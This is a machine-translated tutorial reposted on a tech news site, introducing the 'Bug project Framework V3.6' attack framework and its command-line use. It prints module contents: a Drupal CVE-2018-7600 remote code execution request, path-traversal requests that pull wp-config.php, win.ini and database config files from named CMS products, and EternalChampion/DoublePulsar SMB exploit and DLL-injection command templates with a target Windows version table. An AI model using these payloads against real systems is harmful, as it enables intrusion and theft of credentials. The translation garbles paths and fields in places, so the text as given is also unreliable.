Shulou(Shulou.com)05/31 Report--

This article will explain in detail how to use Bug project Framework V3.6 command line version in web security. The editor thinks it is very practical, so I share it with you as a reference. I hope you can get something after reading this article.

Preface of 0x01

I began to write the graphical interface of the BPF framework in April 2017, and it has been a year and a month since it was developed. However, due to the high portability and simplicity of the graphical interface for vulnerability exploitation and high attack, the graphical interface will not be made public for a variety of reasons. Last week, I began to write the command line version of this 3.6 version.

With regard to the leaked 3.0graphical version circulated on the network, I would like to explain that there are a lot of bug in this version, not only the bug of module syntax, but also the leaked version is tied up with a lot of Trojans. I hope you don't download it hastily to avoid unnecessary losses!

0x02 Project introduction

Software name: Bug project Framework

Version: 3.6

0x03 help

Under the BPF root command line:

Help query help

Reload reloads the framework, and all modules are refreshed

Search search module keywords and display

(e.g. Search ms17-010)

Searchall displays all modules

Use usage module

(e.g. Use\ buffer\ ms17-010 Scan.bpf)

Set shellcodes configuration default Shellcode path

Exit exits BPF

Under the BPF module command line:

Help query help

Show options to view the current module parameters and configuration

Set options sets the current module parameters and configuration

Set shellcodes configuration default Shellcode path

Run operation module

Exit exits the current module

When you enter a command other than the parameters specified above, the BPF framework recognizes the command as a system command and submits it to the Windows operating system for processing

HAPPY HACK! GOOD LUCK!

2018.5.7 BY Fplyth0ner

0x04 hands-on operation

First, we open the command line and change to the folder where the BPF frame is located. The frame file structure is shown below:

Then type the full name of the main file of the BPF framework and execute:

You can see that the framework currently has 59 Web Exploit modules, 12 Web Poc modules and 33 Buffer modules. Web Exploit module provides Web application vulnerability detection, Web Poc module provides Web application vulnerability detection, Buffer module provides external program calls, such as Python,Java and other interpreted language code, or external executable file calls, the operation is flexible.

Since the framework only gives the module an execution environment, and the function is mainly realized through the module, let's briefly show the code of the three modules.

Web Exploit (Drupal core remote code execution vulnerability):

Command

Output file name

two

Post

/ user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax

Connection: keep-alive

Accept-Encoding: gzip, deflate

Accept: * / *

User-Agent: python-requests/2.18.4

Content-Length: 159

Mail [# markup] = | tee .txt & mail [# type] = markup&form_id=user_register_form&_drupal_ajax=1&mail [# post_render] [] = exec

Get

/. Txt

CVE-2018-7600

Remote code execution vulnerability in Drupal core

Affect the version:

Drupal 6.x,7.x,8.x

Web Poc (CMS Getshell vulnerability detection):

three

Download any file from WordPress DB-Backup Plugin

Get

/ wp-content/plugins/db-backup/download.php?file=../wp-config.php

one

Define (

U-Mail arbitrary file traversal / download

Get

/ webmail/client/mail/index.php?module=operate&action=attach-img-preview&d_url= file://C:\windows\win.ini&type=text/htm

one

[fonts]

MetInfo 5.2 arbitrary file read

Get

/ include/thumb.php?x=1&y=/../config&dir=config_db.php

one

Con_db_host

Designed to detect arbitrary file read vulnerabilities killed by CMS

Enter the http:// URL directly to start the test.

Buffer (Eternalchampion):

Inject

NB,NR,MR

Dll

IP address

Port

Attack service

System version

System architecture

five

Doublepulsar-1.3.1.exe-NetworkTimeout 60-TargetIp-TargetPort-Protocol SMB-Architecture-Function OutputInstall-OutputFile 1.bin

Cj.exe

Ping-n 3 127.1 > nul

Eternalchampion-2.0.0.exe-TargetIp-TargetPort-ShellcodeBuffer-Protocol-Target

Doublepulsar-1.3.1.exe-TargetIp-TargetPort 445-DllPayload-Protocol SMB-Architecture-Function Rundll

Upper and lower correspondence

Port: 139 445

Attack service: NBT SMB

System architecture: x86 X64

System version:

XP_SP0SP1_X86

Windows XP Sp0 and Sp1, 32-bit

XP_SP2SP3_X86

Windows XP Sp2 and Sp3, 32-bit

XP_SP1_X64

Windows XP Sp1, 64-bit

XP_SP2_X64

Windows XP Sp2, 64-bit

SERVER_2003_SP0

Windows Sever 2003 Sp0, 32-bit

SERVER_2003_SP1

Windows Sever 2003 Sp1, 32-bit/64-bit

SERVER_2003_SP2

Windows Sever 2003 Sp2, 32-bit/64-bit

VISTA_SP0

Windows Vista Sp0, 32-bit/64-bit

VISTA_SP1

Windows Vista Sp1, 32-bit/64-bit

VISTA_SP2

Windows Vista Sp2, 32-bit/64-bit

SERVER_2008_SP0

Windows Server 2008 Sp0, 32-bit/64-bit

SERVER_2008_SP1

Windows Server 2008 Sp1, 32-bit/64-bit

SERVER_2008_SP2

Windows Server 2008 Sp2, 32-bit/64-bit

WIN7_SP0

Windows 7 Sp0, 32-bit/64-bit

WIN7_SP1

Windows 7 Sp1, 32-bit/64-bit

SERVER_2008R2_SP0

Windows Server 2008 R2 Sp0, 32-bit/64-bit

SERVER_2008R2_SP1

Windows Server 2008 R2 Sp1, 32-bit/64-bit

WIN8_SP0

Windows 8 Sp0, 32-bit/64-bit

Going back to the command line interface, we type: Search command execution

After searching for 21 available modules, we select the second module and use the Use command to use the module

At the prompt of the module, use the show options command to view the module configuration

Use set options to modify the module configuration as follows:

You can see that the modification has been successful.

Then type run, enter, and you can test the specified target.

If you want to exit the current module, type: exit to return to the BPF main prompt, about the use of more other types of modules, much the same as above. At the same time, native system commands can also be used under the BPF command line

This is the end of the article on "how to use Bug project Framework V3.6 command line version in web security". I hope the above content can be of some help to you, so that you can learn more knowledge. if you think the article is good, please share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.